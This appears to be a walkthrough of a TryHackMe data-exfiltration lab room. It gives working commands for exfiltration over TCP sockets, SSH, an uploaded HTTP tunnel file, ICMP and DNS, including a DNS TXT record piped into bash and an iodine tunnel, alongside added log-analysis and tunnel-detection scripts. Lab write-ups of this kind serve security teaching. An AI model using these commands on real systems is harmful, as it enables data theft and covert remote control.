
Data Exfiltration
This guide contains the answers, and the steps needed to reach them, for the Data Exfiltration room.
Table of contents
- Data Exfiltration
- Exfiltration using TCP socket
- Exfiltration using SSH
- Exfiltrate using HTTP(S)
- Exfiltration using ICMP
- DNS Configurations
- Exfiltration over DNS
- DNS Tunneling
Data Exfiltration
-
In which case scenario will sending and receiving traffic continue during the connection?
This answer can be found in the text.
Answer: Tunneling
In which case scenario will sending and receiving traffic be in one direction?
This answer can be found in the text.
Answer: Traditional data exfiltration
In the next task, we will be discussing how data exfiltration over the TCP socket works!
Exfiltration using TCP socket
-
Exfiltration using TCP sockets relies on ____________ protocols!
The answer can be found in the text.
Answer: Non-standard
Now apply what we discussed to exfiltrate data over the TCP socket! Once you exfiltrate data successfully, hit Completed to move on to the next task!
We need to ssh into the jump server and set up a listener that writes whatever it receives to a file.
```console
ssh thm@10.10.66.20
nc -nlvp 1337 > /tmp/task4-creds.data
```
Next we ssh into the victim1 machine through the jump server.
```console
ssh thm@10.10.66.20
ssh thm@victim1.thm.com
```
Next we compress and encode the data we want to exfiltrate in the 'task4' folder.
```console
tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/1337
```
This pipeline archives and compresses the folder, base64-encodes the archive, converts it to EBCDIC and sends the result over the TCP socket to the listener.

Now that the file has been transferred to the jump server, we can decode and decompress the archive to get to the files.
```console
dd conv=ascii if=task4-creds.data | base64 -d > task4-creds.tar
tar xvf task4-creds.tar
```
Exfiltration using SSH
-
All packets sent using the Data Exfiltration technique over SSH are encrypted! (T=True/F=False)
The answer can be found in the text.
Answer: T
Replicate the steps to transfer data over the SSH client. Once you transfer the file successfully, hit Completed and move on to the next task!
On victim1 we can archive the folder and send it directly through the SSH client.
```console
tar cf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
```

Exfiltrate using HTTP(S)
-
Check the Apache log file on web.thm.com and get the flag!
After ssh'ing into the web server through the jump server, we can look at the log file.
```console
sudo cat /var/log/apache2/access.log
```
This gives us the flag in base64 format. Decoding it gives us the flag.
```console
echo VEhNe0g3N1AtRzM3LTE1LWYwdW42fQo= | base64 -d
```
Answer: THM{H77P-G37-15-f0un6}
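On the defending side, the same log can be scanned for encoded data automatically instead of eyeballing it. The following Python script is an added example, not part of the room or this write-up: it parses constructed Apache combined-format log lines (the log lines are made up for the example; the base64 token in the second line is the one shown above), extracts runs of base64 characters from the request target and reports those that decode to readable text.

```python
import base64
import re
from urllib.parse import unquote

# Constructed Apache "combined"-format lines for illustration; they are not the
# room's real access.log. The base64 token in the second line is the one quoted
# on this page, so the decoder can be checked against a known value.
SAMPLE_LOG = """\
10.10.1.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "curl/7.81.0"
10.10.1.5 - - [01/Jan/2024:10:00:07 +0000] "GET /?data=VEhNe0g3N1AtRzM3LTE1LWYwdW42fQo= HTTP/1.1" 200 0 "-" "curl/7.81.0"
10.10.1.9 - - [01/Jan/2024:10:00:09 +0000] "GET /images/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status code of each log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Runs of base64-alphabet characters long enough to be worth decoding.
B64_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')


def try_decode(token: str):
    """Return the decoded text if token is valid base64 yielding printable UTF-8, else None."""
    if len(token) % 4:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def find_base64_in_log(log_text: str):
    """Scan Apache access-log text and return the requests whose target carries decodable base64."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(m.group("target"))  # percent-decode before looking for tokens
        for token in B64_RE.findall(target):
            decoded = try_decode(token)
            if decoded is not None:
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "target": m.group("target"), "token": token, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in find_base64_in_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["target"]} -> {hit["decoded"]!r}')
```

The printable-text filter is what keeps ordinary session tokens and image names from flooding the output; for binary payloads you would instead look at request sizes and frequency per client.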
When you visit the http://flag.thm.com/flag website through the uploader machine via the HTTP tunneling technique, what is the flag?
The first step in creating our HTTP tunnel with neo-regeorg is to generate a key:
```console
python3 neoreg.py generate -k thm
```
Now we can upload the generated tunnel file to the web server at http://10.10.230.138/uploader with the key 'admin'.
Next we can start the tunnel using the key and the URL of the uploaded file.
```console
python3 neoreg.py -k thm -u http://10.10.230.138/uploader/files/tunnel.php
```
When this is done we can use curl through the tunnel to reach the flag server. The proxy is bound to our machine on 127.0.0.1:1080.
```console
curl --socks5 127.0.0.1:1080 http://172.20.0.120:80
```
This is not our flag, but it does point us to the correct page.
```console
curl --socks5 127.0.0.1:1080 http://172.20.0.120:80/flag
```
Answer: THM{H77p_7unn3l1n9_l1k3_l337}
Exfiltration using ICMP
-
In which ICMP packet section can we include our data?
This answer can be found in the text.
Answer: data
Follow the technique discussed in this task to establish a C2 ICMP connection between JumpBox and ICMP-Host. Then execute the "getFlag" command. What is the flag?
On the ICMP server we start the icmpdoor binary, and on the jump server we start the icmp-cnc binary.
```console
sudo icmpdoor -i eth0 -d 192.168.0.133
```
```console
sudo icmp-cnc -i eth1 -d 192.168.0.121
```
Now that a connection has been established, we can send commands to the ICMP server.
Answer: THM{g0t-1cmp-p4k3t!}
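To see exactly where the data section sits in an echo packet, and what a defender can check there, here is an added Python example (not from the room or from the icmpdoor project). It builds constructed ICMP echo messages, parses the 8-byte header, verifies the checksum and flags payloads that do not look like the default ping filler. The "16-byte timestamp followed by filler bytes equal to their offset" pattern for iputils ping is an assumption used as a heuristic, not a specification.

```python
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0
HEADER_FMT = "!BBHHH"  # type, code, checksum, identifier, sequence number
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 8 bytes; everything after is the data section


def icmp_checksum(buf: bytes) -> int:
    """RFC 1071 ones'-complement checksum over 16-bit big-endian words."""
    if len(buf) % 2:
        buf += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(buf) // 2), buf))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(ident: int, seq: int, data: bytes, icmp_type: int = ICMP_ECHO_REQUEST) -> bytes:
    """Build an ICMP echo message (used here only to construct sample packets)."""
    header = struct.pack(HEADER_FMT, icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + data)
    return struct.pack(HEADER_FMT, icmp_type, 0, csum, ident, seq) + data


def parse_icmp(pkt: bytes) -> dict:
    """Split an ICMP message into header fields and its data section, verifying the checksum."""
    if len(pkt) < HEADER_LEN:
        raise ValueError("ICMP message shorter than the 8-byte header")
    icmp_type, code, csum, ident, seq = struct.unpack(HEADER_FMT, pkt[:HEADER_LEN])
    return {
        "type": icmp_type, "code": code, "id": ident, "seq": seq,
        # Summing the whole message including the stored checksum must give zero.
        "checksum_ok": icmp_checksum(pkt) == 0,
        "data": pkt[HEADER_LEN:],
    }


def looks_like_default_ping(data: bytes) -> bool:
    """Heuristic (assumption): iputils ping sends a 16-byte timestamp followed by
    filler bytes whose value equals their offset in the data section (0x10, 0x11, ...)."""
    if len(data) < 16:
        return False
    return all(data[i] == (i & 0xFF) for i in range(16, len(data)))


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII or common whitespace."""
    if not data:
        return 0.0
    return sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13)) / len(data)


def classify_echo(pkt: bytes) -> str:
    """Label an echo packet's data section: default-ping, text-payload or opaque-payload."""
    info = parse_icmp(pkt)
    if info["type"] not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return "not-echo"
    if not info["checksum_ok"]:
        return "bad-checksum"
    data = info["data"]
    if looks_like_default_ping(data):
        return "default-ping"
    if printable_ratio(data) > 0.9:
        return "text-payload"
    return "opaque-payload"


# Constructed sample packets (not captured traffic).
NORMAL_PING = build_echo(0x1234, 1, b"\x00" * 16 + bytes(range(16, 56)))
TEXT_PING = build_echo(0x1234, 2, b"sample text carried in the data section")

if __name__ == "__main__":
    for name, pkt in (("normal", NORMAL_PING), ("text", TEXT_PING)):
        print(name, classify_echo(pkt), parse_icmp(pkt)["data"][:16])
```

A text-payload or opaque-payload verdict on echo traffic between two internal hosts, especially at a steady cadence, is the kind of thing worth a closer look in packet captures; the filler heuristic only covers one ping implementation, so tune it to the clients actually present on your network.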
DNS Configurations
-
Once the DNS configuration works fine, resolve the flag.thm.com domain name. What is the IP address?
Simply running the following command should give us the IP of the flag server.
```console
dig +short flag.thm.com
```
However, if we want to use the AttackBox itself, we must change its DNS settings: edit the nameserver in /etc/resolv.conf to 10.10.230.138.
```console
nano /etc/resolv.conf
```
Now this command will also work from our AttackBox.
Answer: 172.20.0.120
Exfiltration over DNS
-
What is the maximum length for the subdomain name (label)?
The answer can be found in the text.
Answer: 63
The Fully Qualified Domain Name (FQDN) must not exceed ______ characters.
The answer can be found in the text.
Answer: 255
Execute the C2 communication over the DNS protocol of the flag.tunnel.com. What is the flag?
We need to repeat the command we just used, this time to retrieve the contents of the TXT record for the flag.tunnel.com server. After uploading our script in base64 format as a TXT entry, we retrieved the content of the TXT entry with:
[Image: DNS exfiltration, TXT record]
```console
dig +short -t TXT script.tunnel.com
```
We named the TXT entry 'script', hence the subdomain.
We can do the same for the flag.tunnel.com TXT entry.
```console
dig +short -t TXT flag.tunnel.com
```
[Image: DNS exfiltration, base64 output]
We need to decode the string after removing the quotes.
```console
dig +short -t TXT flag.tunnel.com | tr -d "\"" | base64 -d
```
[Image: DNS exfiltration, decoded contents]
This gives us a script to get our flag. We can execute it with:
```console
dig +short -t TXT flag.tunnel.com | tr -d "\"" | base64 -d | bash
```
[Image: DNS exfiltration, flag]
Answer: THM{C-tw0-C0mmun1c4t10ns-0v3r-DN5}
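The two length limits from the questions above (63 characters per label, 255 for the whole name) and the TXT-record trick just shown can both be checked programmatically, which is how a resolver log or a zone's records would be reviewed on the defending side. The following Python is an added example, not part of the room or this write-up: it validates names against those limits and inspects a dig-style TXT answer (constructed here from a sample script, with the quotes dig prints and the 255-character string splitting that long records get) to see whether it is base64 that decodes to a shell script. The shell-keyword list is a rough heuristic of my own.

```python
import base64
import re

MAX_LABEL_LEN = 63   # one label (subdomain component)
MAX_NAME_LEN = 255   # the whole FQDN

# Constructed sample: a short script stored base64-encoded in a TXT record, and the
# answer as `dig +short -t TXT` would print it (quoted, split into 255-character
# strings when longer than one TXT string). Not the room's actual record.
SAMPLE_SCRIPT = "#!/bin/bash\necho 'constructed sample payload'\n"
_b64 = base64.b64encode(SAMPLE_SCRIPT.encode()).decode()
SAMPLE_TXT_ANSWER = " ".join(f'"{_b64[i:i + 255]}"' for i in range(0, len(_b64), 255))
SAMPLE_SPF_ANSWER = '"v=spf1 -all"'  # an ordinary TXT record for comparison


def name_problems(name: str) -> list:
    """Return the RFC 1035 length-limit violations in a DNS name (empty list if none)."""
    name = name.rstrip(".")
    problems = []
    if len(name) > MAX_NAME_LEN:
        problems.append(f"name is {len(name)} chars, limit {MAX_NAME_LEN}")
    for label in name.split("."):
        if not label:
            problems.append("empty label")
        elif len(label) > MAX_LABEL_LEN:
            problems.append(f"label '{label[:10]}...' is {len(label)} chars, limit {MAX_LABEL_LEN}")
    return problems


def is_valid_name(name: str) -> bool:
    return not name_problems(name)


def decode_txt_answer(answer: str):
    """Join the quoted strings of a dig TXT answer (what `tr -d '\"'` does on the page) and
    base64-decode the result; returns the decoded text, or None if it is not base64 text."""
    joined = "".join(re.findall(r'"([^"]*)"', answer)) or answer.strip()
    joined = joined.replace(" ", "")
    if len(joined) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", joined):
        return None
    try:
        return base64.b64decode(joined, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_txt_answer(answer: str) -> str:
    """'shell-script' if the record decodes to something a shell would run, 'base64-text' if
    it decodes to other text, 'plain' if it is not base64 at all."""
    decoded = decode_txt_answer(answer)
    if decoded is None:
        return "plain"
    # Heuristic (assumption): a shebang or common shell tool names mark a script.
    if decoded.startswith("#!") or re.search(r"\b(bash|sh|curl|wget|nc)\b", decoded):
        return "shell-script"
    return "base64-text"


if __name__ == "__main__":
    print(name_problems("a" * 70 + ".tunnel.com"))
    print(classify_txt_answer(SAMPLE_TXT_ANSWER), classify_txt_answer(SAMPLE_SPF_ANSWER))
```

Records in your own zones that classify as shell-script, or query names that sit right at the label limit, are worth alerting on; legitimate TXT use (SPF, DKIM, domain verification) is plain text and stays in the plain bucket.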
DNS Tunneling
-
When the iodine connection establishes to Attacker, run the ifconfig command. How many interfaces are there? (including the loopback interface)
First we add the A and NS records to the DNS server to point to our AttackBox.
[Image: DNS tunnel, A record]
[Image: DNS tunnel, NS record]
Now that traffic for t1.tunnel.com will be directed to our machine, we can set up the iodine server on the AttackBox.
```console
sudo /sbin/iodined -f -c -P thmpass 10.1.1.1/24 t1.tunnel.com
```
[Image: DNS tunnel, server]
Then we set up the client side on the jump machine.
```console
sudo iodine -f -P thmpass t1.tunnel.com
```
[Image: DNS tunnel, client]
We can now check how many interfaces are active on the jump machine.
[Image: DNS tunnel, interfaces]
Answer: 4
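From the defender's side, an iodine tunnel like the one just set up has a characteristic shape in resolver logs: many queries to one zone, each with a long subdomain label that never repeats, in record types ordinary clients rarely ask for. The following Python is an added example, not from the room or the iodine project: it summarizes constructed resolver-log lines per zone and flags zones matching that pattern. The log line format, the "last two labels" zone guess and the thresholds are assumptions made for the example.

```python
import hashlib
from collections import defaultdict

# Constructed resolver-log lines: "<seconds> <client> <qname> <qtype>". Not real traffic.
# The tunnel-like entries imitate what a DNS tunnel client produces: many queries, each to
# a fresh high-entropy subdomain of one zone, in a record type normal clients rarely use.
def _constructed_log() -> str:
    lines = []
    for i in range(40):
        label = hashlib.sha256(str(i).encode()).hexdigest()[:48]  # deterministic "random" label
        lines.append(f"{i} 10.10.1.5 {label}.t1.tunnel.com NULL")
    for i, host in enumerate(["www.example.com", "mail.example.com", "www.example.com"]):
        lines.append(f"{100 + i} 10.10.1.7 {host} A")
    return "\n".join(lines)

SAMPLE_LOG = _constructed_log()
# Types a browsing client seldom queries but tunnel tools commonly carry data in.
RARE_TYPES = {"NULL", "TXT", "CNAME", "MX", "SRV"}


def zone_of(qname: str) -> str:
    """Crude registrable-domain guess: the last two labels (assumption; real data needs the PSL)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def summarize(log_text: str) -> dict:
    """Per-zone stats: query count, distinct-name ratio, rare-type ratio, mean leftmost-label length."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "rare": 0, "label_len": 0})
    for line in log_text.splitlines():
        _ts, _client, qname, qtype = line.split()
        s = stats[zone_of(qname)]
        s["queries"] += 1
        s["names"].add(qname)
        if qtype.upper() in RARE_TYPES:
            s["rare"] += 1
        s["label_len"] += len(qname.split(".")[0])
    return {
        zone: {
            "queries": s["queries"],
            "distinct_ratio": len(s["names"]) / s["queries"],
            "rare_type_ratio": s["rare"] / s["queries"],
            "mean_label_len": s["label_len"] / s["queries"],
        }
        for zone, s in stats.items()
    }


def flag_tunnels(log_text: str, min_queries=20, min_distinct=0.8, min_rare=0.5, min_label=30) -> list:
    """Zones whose query pattern matches a DNS tunnel on all four thresholds
    (the thresholds are illustrative assumptions, to be tuned against your own baseline)."""
    return sorted(
        zone for zone, s in summarize(log_text).items()
        if s["queries"] >= min_queries and s["distinct_ratio"] >= min_distinct
        and s["rare_type_ratio"] >= min_rare and s["mean_label_len"] >= min_label
    )


if __name__ == "__main__":
    for zone, s in summarize(SAMPLE_LOG).items():
        print(zone, s)
    print("flagged:", flag_tunnels(SAMPLE_LOG))
```

Counting per zone rather than per full query name is what makes this work: every tunnel query name is unique, so only the zone aggregate shows the volume. CDN and anti-spam lookups can also produce long unique labels, which is why the record-type ratio is required as a second signal.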
What is the network interface name created by iodined?
There is one interface that was added after establishing the connection; it is the top one in the previous image.
Answer: dns0
Use the DNS tunneling to prove your access to the webserver, http://192.168.0.100/test.php. What is the flag?
Now that the DNS tunnel is in place we can connect to the jump box through the tunnel via ssh.
```console
ssh thm@10.1.1.2 -4 -N -F -D 1080
```
This creates an ssh session with -D to enable dynamic port forwarding, so the SSH session can be used as a proxy, using only IPv4 (-4).
[Image: DNS tunnel, SSH]
At first I thought something didn't work, but later found out that the ssh session was backgrounded with the -f argument. Now we can use two methods to connect to the local machine: curl or Proxychains.
Using curl can be done with the following command:
```console
curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php
```
[Image: DNS tunnel, curl flag]
For Proxychains we must first add the proxy to the config file.
```console
nano /etc/proxychains4.conf
# Add at the end
socks5 127.0.0.1 1080
```
Now we can also use Proxychains with:
```console
proxychains curl http://192.168.0.100/test.php
```
[Image: DNS tunnel, Proxychains flag]
Answer: THM{DN5-Tunn311n9-1s-c00l}